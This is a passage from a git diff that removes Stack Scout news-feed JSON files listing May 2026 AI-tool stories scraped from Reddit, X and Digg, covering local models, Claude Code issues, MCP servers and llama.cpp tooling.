idleDeadlineMs=300000 There are some unrelated MCP auth/config errors too, but the main issue is that Claude starts responding and then stops producing a usable answer. Has anyone else seen Claude Code/VS Code fail this way on large prompts? Is this a known streaming bug, server-side issue, or something caused by heavy tool/skill context?", - "category": "ai_tools" - }, - { - "title": "WSL can't reach Kobold.cpp running on Windows, even though the API works fine in PowerShell, SillyTavern & a Kenshi SentientSands Mod. Does anyone know the solution?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tf7f4d/wsl_cant_reach_koboldcpp_running_on_windows_even/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-16T22:24:17.000Z", - "summary": "Okay sorry for the slop below but I'm losing my mind with this and I'm hoping someone here has dealt with the same setup. (I asked the AI that let me copy&paste shit for 3 hours to summarise what it asked me to do) Here's the situation: * Kobold.cpp is running on Windows * The OpenAI-compatible API is on port 5001 * It works from PowerShell on Windows, SillyTavern and a Kenshi Mod (SentientSands) * But WSL cannot connect to it, even though it's the same machine Kobold.cpp starts normally and shows that the OpenAI-compatible API is running on `http://0.0.0.0:5001/v1/`. From **PowerShell**, this works fine: bash curl http://127.0.0.1:5001/v1/models and it returns the model list. From **WSL**, `pwd` works normally, but this fails: bash curl http://127.0.0.1:5001/v1/models with: bash curl: (7) Failed to connect to 127.0.0.1 port 5001 after 0 ms: Could not connect to server So at this point I know: * Kobold itself is running fine * The API endpoint is working on Windows * The actual problem is specifically WSL trying to reach a service hosted on the Windows side Things I already tried: * Binding Kobold to [`0.0.0.0`](http://0.0.0.0) instead of only localhost * Changing WSL config t…", - "category": "ai_models" - }, - { - "title": "I replicated Anthropic's Generator-Evaluator harness to build a website through 12 adversarial AI iterations - here's the result and what I learned", - "url": "https://reddit.com/r/ClaudeAI/comments/1tf76wp/i_replicated_anthropics_generatorevaluator/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-16T22:14:25.000Z", - "summary": "Anthropic recently published their [harness design for long-running apps](https://www.anthropic.com/engineering/harness-design-long-running-apps) — a multi-agent architecture inspired by GANs where a Generator builds code and an Evaluator critiques it in a loop. I built my own version using Kiro CLI and used it to generate a marketing website for my project [Mnemo](https://github.com/Mnemo-mcp/Mnemo) (persistent memory for AI coding agents). **The architecture:** Planner (runs once) → Generator ↔ Evaluator (12 iterations) Each agent is a separate CLI process with zero shared context. They communicate only through files (spec.md, eval-report.md). The Evaluator uses Playwright to actually browse the live site — not just read code. **What made it work:** **Clean slate per invocation** — each agent starts fresh, reads only its input files. Prevents context anxiety. **Playwright MCP for testing** — the evaluator navigates, clicks, resizes viewports. Catches visual bugs code review never would. **Anthropic's frontend design skill** — explicitly penalizes generic AI patterns (Inter font, purple gradients, card layouts). Forces creative risk-taking. **Continuous iteration, not retry-on-fa…", - "category": "ai_tools" - }, - { - "title": "Interconnects newsletter reviews wave of open AI releasesOpen AI models saw a burst of new releases this month from several labs. The Interconnects newsletter reviewed five of them, including Gemma 4 and DeepSeek V4, using the CAISI V4 evaluation framework.", - "url": "https://www.digg.com/ai/09imapy5?rank=7", - "source": "Digg AI", - "tags": [ - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-16T20:04:50.938Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "How I started programming differently over the last year. What about you?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tf2cxh/how_i_started_programming_differently_over_the/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-16T18:58:05.000Z", - "summary": "An interesting observation: I’ve stopped using the LLM-powered autocomplete in my IDE. At first, it was one of the key features for me. It felt extremely convenient: you start writing a function in your code, and the LLM completes it based on common sense or the context from the open tabs. But the most interesting thing is that back when LLM autocomplete was useful and in demand, I had already written a script that could go through the source files, let me select what I needed, and prepare the context to feed into an LLM chat so it could tell me what to add or fix. I worked like that for about six months. And even that is gone now. These days it’s easier to open a CLI interface with a coding agent, without even launching the IDE. You describe what you need, use @ to point it to the files it should inspect or modify, and that’s it. Everything is changing at an absolutely insane speed. Basically, the only things I still use an IDE for are nice Git diff visualization, step-by-step debugging, and the ability to click on functions and jump into their implementation. In other words, code navigation. And even that functionality is only needed in about 5-10% of my work. It’s interesting t…", - "category": "ai_models" - }, - { - "title": "LLM Phone Home: Reliable Apps that can deliver inference from local backend", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tez9sb/llm_phone_home_reliable_apps_that_can_deliver/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-16T17:02:05.000Z", - "summary": "Hello all, I’m wondering what suggestions there are for an ios app that can serve an openai compatible endpoint. I am using 3sparks which works GREAT for that specific use, BUT, there is no mcp, no web search, etc. I want to show people that a local model with web search on your phone is very impressive, but I can’t find an app that can mimic OWUI/LMS/etc. Texting Hermes works but I was hoping to find a solution that is not using a slow agent, just calling requests from local server. So far, I tried: Apollo, Locally AI, Noema, and 3 Sparks. Previously I have gone through other apps that run models in situ (in the iphone) but they don’t have remote endpoint usage. Noema seemed promising but Deepseek V4 Flash from my mac studio never makes it through a request (works great with 3 Sparks, but no web search or mcp capability).", - "category": "ai_models" - }, - { - "title": "Frameo AI Launches Pixar-Style Short Films Powered by Seedance 2.0 — Native Audio, Multi-Shot, Director Mode", - "url": "https://x.com/frameo_ai/status/2055642282796400821", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-05-16T14:56:25.012Z", - "summary": "Frameo AI launched Pixar-quality short films on Seedance 2.0 with native audio and Director Mode, making cinematic AI video creation accessible to independent creative producers.", - "category": "ai_tools" - }, - { - "title": "How Do You Tell If Someone Is Good at Agents? — Scoble Asks the Question the AI Industry Cannot Answer", - "url": "https://x.com/Scobleizer/status/2055566706714845328", - "source": "Aligned News (Scoble)", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-16T14:52:06.433Z", - "summary": "Scoble's question on evaluating agent development talent surfaces the unsolved hiring signal problem as companies scramble for AI agent skills with no reliable credential or assessment framework.", - "category": "ai_tools" - }, - { - "title": "Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard!", - "url": "https://reddit.com/r/LocalLLaMA/comments/1temio0/qwen3635ba3b_and_9b_are_officially_on_the_public/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-16T07:19:25.000Z", - "summary": "Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard! little-coder × Qwen3.6-35B-A3B hit 24.6% (±3.2), and **now land above Gemini 2.5 Pro on Gemini CLI (19.6%)** and Qwen3-Coder-480B on Terminus 2 (23.9%). I didn’t expect the scaffold-model gap from Polyglot to hold on a benchmark this hard but it did! little-coder × Qwen3.5-9B came in at 9.2% which is more humble. Yet, it also shows again that **sub-10B local models are now measurable on a hard agentic benchmark**, not assumed unworthy of a slot. Just felt it was right to follow up here as you requested, and say a genuine thanks to this community. It really is the place currently driving innovation toward less compute, and this run exists there because you pushed for it. Now it’s time to head for the top of the leaderboard 👀 let’s go open source!", - "category": "ai_models" - }, - { - "title": "Claude in Chrome extension stopped working in claude.ai after using Claude Code — anyone else?", - "url": "https://reddit.com/r/ClaudeAI/comments/1teudps/claude_in_chrome_extension_stopped_working_in/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.88, - "date": "2026-05-16T13:55:37.000Z", - "summary": "Hey everyone, running into a weird issue and hoping someone has seen this before. A few hours ago, Claude in Chrome was working fine in the claude.ai web app. Then I started using Claude Code (CLI) with the \\`--chrome\\` flag, which connected to the extension no problem. Ever since, the extension refuses to connect from claude.ai — but it still works fine from Claude Code and the extension itself appears active and logged in. \\*\\*Setup:\\*\\* \\- Claude in Chrome extension installed and signed in \\- Same account on [claude.ai](http://claude.ai) and Claude Code \\- Extension shows as active in Chrome toolbar \\*\\*What works:\\*\\* \\- ✅ Claude Code CLI (\\`claude --chrome\\`) connects to the browser fine \\- ✅ Extension itself appears active and logged in \\- ❌ [claude.ai](http://claude.ai) web app: consistently returns \"Browser extension is not connected\" \\*\\*What I've already tried (nothing helped):\\*\\* \\- Restarted Chrome \\- Restarted PC \\- Logged out and back into [claude.ai](http://claude.ai) \\- Disabled and re-enabled the extension My theory: once Claude Code connected to the extension, it somehow \"claimed\" the connection and the [claude.ai](http://claude.ai) web app can no longer get thr…", - "category": "ai_tools" - }, - { - "title": "Free Premiere Pro extension to download YouTube/Instagram/X videos and auto-import to your project bin", - "url": "https://reddit.com/r/ClaudeAI/comments/1tf20ta/free_premiere_pro_extension_to_download/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.78, - "date": "2026-05-16T18:45:19.000Z", - "summary": "Tired of the whole workflow — open browser, find video, download, wait, drag into Premiere. So I built a panel that does it all from inside Premiere. Paste a URL, pick quality, click Download & Import — file lands directly in your project bin. Supports: \\- YouTube, Instagram, X/Twitter \\- Best / 1080p / 720p / 480p / MP3 \\- Live progress bar with ETA \\- Auto-import to project bin on finish Powered by yt-dlp under the hood. Built this with the help of Claude (AI) — had the idea and kept iterating until it worked. Free & open source: [https://github.com/gitttsarya/media-fetcher-premiere](https://github.com/gitttsarya/media-fetcher-premiere) Full install guide in the README. Let me know if you run into any issues! https://preview.redd.it/y5svnpjuoj1h1.png?width=482&format=png&auto=webp&s=0dfb391daefb06dbbb37c4b13174efc6a1ca7a22", - "category": "ai_tools" - }, - { - "title": "Using Claude chat for making Apps.", - "url": "https://reddit.com/r/ClaudeAI/comments/1teum62/using_claude_chat_for_making_apps/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.78, - "date": "2026-05-16T14:05:01.000Z", - "summary": "I have been using Claude chat to build structural engineering calculation apps, and it has worked very well for me. Claude generates the files, and I host the projects on GitHub. To avoid hitting the context window limit, I periodically start new chat sessions. When I do, I download the ZIP file from GitHub (including the MD file), and paste it into the new chat so Claude has the project context again. I was wondering if there are any drawbacks to working this way. I do not use Claude Code (don’t have coding background )or the terminal much. I tried it once but did not really like the workflow. Most of my coding is done on the go through the chat interface on my phone or on my computer at work and at home.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-17.json b/data/news-feed-2026-05-17.json deleted file mode 100644 index 75d5bae..0000000 --- a/data/news-feed-2026-05-17.json +++ /dev/null @@ -1,267 +0,0 @@ -{ - "generated": "2026-06-05T00:44:40.711Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-17", - "article_count": 15, - "archived_story_count": 420, - "articles": [ - { - "title": "I built SeeFlow - architecture diagrams that actually run, wired to your live app", - "url": "https://reddit.com/r/ClaudeAI/comments/1tfd6j6/i_built_seeflow_architecture_diagrams_that/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "mcp", - "open_source", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-17T02:50:20.000Z", - "summary": "Architecture diagrams rot. You spend an afternoon in Confluence, three months later it's wrong, and nobody updates it because there's no forcing function. https://preview.redd.it/9svmg8ih3m1h1.png?width=2508&format=png&auto=webp&s=0d06df1f82fd417ee9a45e504efd26628eaf33fd SeeFlow tries to fix that by making diagrams executable. It generates a flow canvas from your codebase, then wires each node to your actual running app. There's a Claude Code / Codex/ Cursor / Windsurf plugin that does the heavy lifting: >/seeflow show me the shopping cart feature It also ships an MCP server so any MCP-aware editor can register and edit demos without leaving the IDE. Link to the site: [https://seeflow.dev](https://seeflow.dev) 100% Free/ MIT Open Source", - "category": "ai_tools" - }, - { - "title": "ROCm 7.13 nightly adds strix halo optimizations", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tftg09/rocm_713_nightly_adds_strix_halo_optimizations/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-17T15:56:56.000Z", - "summary": "[https://www.phoronix.com/news/ROCm-7.13-Released](https://www.phoronix.com/news/ROCm-7.13-Released) Quote: ...new optimizations for Ryzen AI Max 300 \"Strix Halo\" and the ROCprof Trace Decoder is now open-source...<snip>... Those rolling from source can grab the ROCm 7.13 Tech Preview via [TheRock on GitHub](https://github.com/ROCm/TheRock/releases/tag/therock-7.13). [https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html](https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html) Trivia: Rocm name origin: radeon open compute module", - "category": "ai_models" - }, - { - "title": "I updated my tool that turns any book into character & landscape images using RAG + ComfyUI/Gemini — now with Locations support!", - "url": "https://reddit.com/r/StableDiffusion/comments/1tfro2h/i_updated_my_tool_that_turns_any_book_into/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "open_source", - "tool_update" - ], - "matching_tags": [ - "api_update", - "open_source", - "tool_update" - ], - "importance": 0.78, - "date": "2026-05-17T14:51:01.000Z", - "summary": "Hey everyone! I am back with an update to my character generation tool. I got some great feedback when I posted it here, I am pleased to announce that I have integrated a lot of requested features and added a lot more ! **Big thanks to everyone who tried the tool from the first post and gave valuable suggestions !** All the updates and features for just 2.99 a month ! No, just kidding, still fully open source. **Image gallery -** Modern Dracula adaptation, plus some characters from the Eye of the world ( which inspired this whole project ). Tool screenshots at the end. # What's new in this update? # 🔧 QoL updates ! Configurable .env file, api endpoints for Ollama, OpenAI etc, database for books generated, character details saved after generation, image gallery, prompt save feature, installer, updated UI, support for epub/text, Gemini image integration, collapsible sidebars, task manager widget, debug panel to test connections or databases, and tons more # 📍 Locations Tab — \"The one I didn't know I needed\" This was the exciting one. You can now generate **landscape/architectural images** for prominent locations in the book — not just characters. * Click **\"Extract Locations from…", - "category": "creative_tools" - }, - { - "title": "Are local models good enough yet for AI meeting memory?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tfukyl/are_local_models_good_enough_yet_for_ai_meeting/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-05-17T16:38:58.000Z", - "summary": "I’ve been testing different ways to handle AI meeting notes and realized the most useful part isn’t the summary, it’s having searchable context from past meetings later. Right now I’m using Bluedot because it handles capture really well, transcripts, summaries, action items, recordings, all searchable after. The new Claude MCP integration made me realize how valuable meeting history becomes once you can actually query it naturally. Are you building local AI meeting memory setups, or are cloud tools still way ahead for this use case?", - "category": "ai_models" - }, - { - "title": "NeuralCompanion", - "url": "https://reddit.com/r/StableDiffusion/comments/1tftqwg/neuralcompanion/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-17T16:07:34.000Z", - "summary": "NeuralCompanion is an open-source, local-first AI companion project for people who like building, experimenting, and seeing how far personal AI can go on their own hardware. It brings together realtime voice chat, local LLMs, TTS/STT, image generation, interactive tutorials, API-friendly workflows, and a modular addon system into one desktop app designed to be flexible, hackable, and genuinely fun to explore. NC also supports avatar systems and avatar engines like VSeeFace, VAM/VAM2, and other experimental realtime avatar workflows. It is still experimental and a little rough around the edges in places, but that is part of the project. The goal is not to make another locked-down corporate assistant. It is to build a customizable AI companion platform you can actually run, modify, and shape yourself. If you are into local AI, creative tools, avatars, plugins, voice interfaces, automation, or weird future-facing software, come take a look. GitHub: [https://github.com/Rakile/NeuralCompanion](https://github.com/Rakile/NeuralCompanion) Discord: [https://discord.com/invite/UqnwX46rcK](https://discord.com/invite/UqnwX46rcK) Developers, tinkerers, artists, AI enthusiasts, and curious peop…", - "category": "creative_tools" - }, - { - "title": "Made a simple template manager and GUI for llama.cpp so I don't have to keep memorizing CLI flags.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tfqrbt/made_a_simple_template_manager_and_gui_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "product_launch", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-17T14:15:45.000Z", - "summary": "[Introducing Hexllama](https://reddit.com/link/1tfqrbt/video/uobdgqq1hp1h1/player) Hey, I’ve always found **llama-server** to be more than enough for testing out local models, mostly because it guarantees you always have the absolute latest llama.cpp features and architecture support. But keeping track of different CLI commands, context sizes, and batch settings for different models was becoming a massive headache. Plus, managing multiple terminal tabs when I wanted to run two models at once was annoying. So, I built **Hexllama**. It's a fast desktop interface that gets out of your way and just makes managing llama.cpp easier. No walled gardens, just a clean wrapper. **What it actually does:** * **Template-Based Execution:** You configure your CLI flags (threads, context, etc.) once via a visual editor, save it as a template, and from then on it’s just one click to run. * **Built-in llama.cpp Version Manager:** This is the feature I use the most. It auto-checks the ggml-org repo, lets you download new releases directly in the app, and lets you swap backends instantly (super useful when a new model architecture drops and needs a specific build). * **Integrated HF Downloader:** Sear…", - "category": "ai_models" - }, - { - "title": "Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription", - "url": "https://x.com/lordsa_m/status/2055959075012104631", - "source": "X search / AI model updates", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-17T10:30:16.000Z", - "summary": "Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription", - "category": "ai_models" - }, - { - "title": "Is there a new Wan2.2 lightx2v (20260412) FP8 version for ComfyUI?", - "url": "https://reddit.com/r/StableDiffusion/comments/1tfkwx7/is_there_a_new_wan22_lightx2v_20260412_fp8/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 1, - "date": "2026-05-17T09:43:32.000Z", - "summary": "I decided to check the `lightx2v` Hugging Face account and noticed they released an updated version of their distilled Wan2.2 i2v A14b model about a month ago. They uploaded a new version 20260412 on Hugging Face, \"Wan2.2-Distill-Models\" repository. (Can't post a link because Reddit filters block the post) However, they only uploaded the FP32 version, which is also incompatible with ComfyUI. I can't find a converted version via Google or Hugging Face search. Does anyone know how to convert this model to FP8, or would someone be willing to convert it and upload it?", - "category": "creative_tools" - }, - { - "title": "Jackrong/Qwopus3.5-9B-Coder-GGUF · Hugging Face", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tfin40/jackrongqwopus359bcodergguf_hugging_face/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-17T07:33:35.000Z", - "summary": ">**Qwopus3.5-9B-coder** is specially optimized and fine-tuned for high-performance **🤖 Agentic Coding, complex Tool Calling, and logical reasoning.** >*💡* ***Why the 9B Dense Model?*** *We believe that the 9B dense architecture represents the perfect* ***\"sweet spot\"*** *for large language models. It runs seamlessly at 8-bit precision on entry-level 16GB RAM devices—such as standard laptops and the Mac mini—making it exceptionally lightweight yet highly versatile. Without requiring expensive hardware, it allows you to achieve excellent performance paired with impressive inference speeds. Simply put,* ***Qwen3.5-9B is currently the best open-source model in its class.*** # 🛠 Training Strategy The fine-tuning process of this model deeply integrates **Trace Inversion** data augmentation technology with high-quality **Agent Traces**. This systematic approach not only strengthens the model's ability to solve complex programming tasks, but also greatly improves its logical coherence and accuracy when using various tools. This model is designed specifically for the following goals: * 🧩 More structured and stronger logical reasoning capabilities, reducing repetitive thinking * �…", - "category": "ai_models" - }, - { - "title": "2026.5.16 released. Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes:", - "url": "https://x.com/OliverB72157882/status/2055972796711502049", - "source": "X search / AI model updates", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 0.9800000000000001, - "date": "2026-05-17T11:24:47.000Z", - "summary": "2026.5.16 released. Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes:", - "category": "ai_models" - }, - { - "title": "I ran 100 Claude + Codex sessions in parallel to understand what I'm doing wrong in marketing my open source \"Claude Command Center\". Here's the playbook they came up with.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tfbxmf/i_ran_100_claude_codex_sessions_in_parallel_to/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 0.9400000000000001, - "date": "2026-05-17T01:50:08.000Z", - "summary": "A week ago I launched my open-source project (Claude Control Center) on this subreddit. Got 0 upvotes. Dead in 5 hours. :) \\[The app is awesome - great way to manage multiple sessions and avoid waiting on top of Claude + Codex - try it :) [git:amirfish1/ccc](http://github.com/amirfish1/claude-command-center) . So I spawned **100 Claude + Codex agents** in parallel and asked them to figure out what I did wrong (It had two hours left on my weekly Claude limit and 20% left - tried to think of good use :) ) . 30 minutes and 100 artifacts later, they handed me back a playbook. https://reddit.com/link/1tfbxmf/video/0mi1ytksol1h1/player The headline finding: stars don't come from better code. They come from: marketing surface. Tagline, demo GIF, founder credential, hosted landing page, multi-shot Hacker News, awesome-list inclusion. The system found that gap on its own - I never told it to study marketing. 5-min video walking through the 7 findings + what the agents drafted (Show HN body, X thread, LinkedIn post, channel plan): [https://youtu.be/Tm2svTe\\_Ed4](https://youtu.be/Tm2svTe_Ed4) The video itself - is \\*ON PURPOSE\\* 100% built by the AI who created the agents \\[happy to share th…", - "category": "ai_tools" - }, - { - "title": "Claude Code context-window: /clear after EVERY task in the codebase or are there edge cases?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tfnqmc/claude_code_contextwindow_clear_after_every_task/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.54, - "date": "2026-05-17T12:08:39.000Z", - "summary": "So I have been recently coding a bunch with the following setup: I am launching Claude Code CLI inside of my repo (a complete shopify theme; if you are unfamiliar it is 3-8mb of source code, structurally something like this: `layout/ 2–3 files (theme.liquid = root shell)` `templates/ 15–25 files (one per page type, JSON or liquid)` `sections/ 30–50 files (reusable page blocks)` `snippets/ 20–40 files (sub-components, like partials)` `assets/ 30–60 files (css, js, svgs)` `locales/ 5–10 files (i18n JSON)` `config/ 2 files (settings_schema.json = theme editor config)` ) I also have an app set up that shows, what the current usage of the models context windows is currently at in %. **Recently I have been wondering: say I give claude quite a heavy task that involves the typical stack of 3 files (1 .js, 1 .liquid and 1 .css) and this instantly bumps up the context window from 0% to 10%, is there a golden rule that one should always do /clear after such an extensive task or does it depend if say, the next task depends on the same 3 files?** Do you guys have any advice on when the perfect time is to /clear? What are your experiences with this? Do you know of any addons that could facilita…", - "category": "ai_tools" - }, - { - "title": "LLM's on Android (Snapdragon 8 Elite) MOE Experience", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tg3ssd/llms_on_android_snapdragon_8_elite_moe_experience/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-17T22:22:53.000Z", - "summary": "So I bought a phone with Snapdragon 8 elite (gen 4) and 24GB ram (Honor magic 7 pro). My experience has been mixed but with solid potential. Hexagon (Snapdragon 8 Elite) NPU and OpenclGPU support and updates have been rolling in fast but still the fastest prompt processing and token generation have mostly been CPU (I would bet that soon enough either NPU or GPU will be faster or more realistically both). CPU has the downside of generating more heat than NPU and GPU inference but overall it's still the fastest **currently**. Now there are no phones with 32gb ram without a virtual ram extension which doesn't work with LLM's ofc, so the best you will do is 24gb ram. What can you do with 24gb ram and a smartphone processor though? Quite a lot actually, MOE has been getting quite popular and their Q4 quants of these models are great and fit into the 24GB. My personal recommendation is IQ4\\_XS and MXFP4\\_MOE since with what I have tested MXFP4\\_MOE is quite faster but for the size IQ4\\_XS can't be beaten. Q4\\_0 is more optimised but quality wise it's worse than both (subjectively from my own experience). Goes without saying but Q4\\_K\\_M is also quite reliable from a speed/quality/size s…", - "category": "ai_models" - }, - { - "title": "While waiting for Fara-1.5 for my coding harness", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tg3kbz/while_waiting_for_fara15_for_my_coding_harness/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-17T22:13:11.000Z", - "summary": "Hi all, Not sure many people are aware so wanted to give a word about [Fara-1.5 release](https://www.microsoft.com/en-us/research/video/magenticlite-a-full-stack-agentic-experience-powered-by-small-models/). => this release will likely be the big sister of [Fara-7B](https://huggingface.co/bartowski/microsoft_Fara-7B-GGUF) and built on top of Qwen3.5 Actual Fara-7B performs not bad at all but actually requires a proper implementation, and I really hope the 1.5 will be SOTA, in different (including smaller) versions, and may simplify all the pipeline! I gave my coding agent harness extra built-in features: * browser automation tool allowing navigation either via accessibility tree only (CDP / DOM) or via vision + grounding (the above video uses Qwen3.6 35B + Fara-7B) * the possibility to generate prefilled \"skills\" directly from conversation history + Jobs to schedule auto-run * recording from user actions (requires vllm for video and maybe llama.cpp following [this PR](https://github.com/ggml-org/llama.cpp/pull/21858)?) Feel free to have a look at the project, it is focused on controllability and low context footprint: [https://github.com/leflakk/openclose](https://github.com/le…", - "category": "ai_models" - }, - { - "title": "Pushing the limit: minimax m2.7 q8_0 128k on 2x3090, 256GB DDR4", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tg37t6/pushing_the_limit_minimax_m27_q8_0_128k_on_2x3090/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-17T21:59:27.000Z", - "summary": "CPU is just a secondhand 10900x. Using 128k context, unquantized kv cache. Model is at q8\\_0 to mitigate some weird behavior I was seeing at lower quants. Speed is very slow at around 50tps pp, 10tps tg, but usable for coding agent workflows. Anybody else running MoE models in this size class on relatively low-end hardware? For my purposes, speed is less important than accuracy, as long as it's not like literally all day. Any other models you'd recommend I'd try or additional optimization tips that could help within my constraints? I wish they'd released the draft model for MTP on this model but it looks like they declined to do so for 2.7. My ik\\_llama flags -- sorry for the funny formatting, this is pasted out of my vibe coded NixOS config: \"${ik-llama-cuda}/bin/llama-server\" + \" -m ${modelPath}\" + \" --host 0.0.0.0\" + \" --port ${toString cfg.port}\" + \" -c ${toString cfg.contextLength}\" + \" -ngl 999\" + \" --cpu-moe\" + \" -sm graph\" + \" -fa on\" + \" -t 16\" + \" -tb 16\" + \" -b 4096\" + \" -ub 4096\" + \" -np 1\" + \" -muge\" + \" -ger\" + \" --jinja\" + \" --metrics\" + \" --temp 1.0\" + \" --top-p 0.95\" + \" --top-k 40\" + \" --min-p 0.01\"", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-18.json b/data/news-feed-2026-05-18.json deleted file mode 100644 index c2cb2b0..0000000 --- a/data/news-feed-2026-05-18.json +++ /dev/null @@ -1,273 +0,0 @@ -{ - "generated": "2026-06-05T00:44:40.968Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-18", - "article_count": 15, - "archived_story_count": 665, - "articles": [ - { - "title": "obsidian-mcp-server: v3.2.0 Released", - "url": "https://reddit.com/r/ClaudeAI/comments/1tg692a/obsidianmcpserver_v320_released/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-18T00:07:48.000Z", - "summary": "[obsidian-mcp-server](https://github.com/cyanheads/obsidian-mcp-server) [3.2.0](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.2.0) adds an `omnisearch` mode to `obsidian_search_notes` (BM25-ranked, typo-tolerant, PDF + OCR via the [Omnisearch](https://github.com/scambier/obsidian-omnisearch) and [Text Extractor](https://github.com/scambier/obsidian-text-extractor) plugins), MCP-spec cursor pagination across all search modes, and a `nameRegex` filter on `obsidian_list_commands`. Recent Releases: [v3.1.11](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.11) brought the same `nameRegex` filter to `obsidian_list_tags`, and [v3.1.10](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.10) added server-level instructions on the MCP `initialize` response. Note: The HTTP endpoint in Omnisearch is disabled by default. You must enable it in the Omnisearch plugin settings. Let me know if you have any questions/issues!", - "category": "ai_tools" - }, - { - "title": "Witchcraft, fast local semantic search on top of 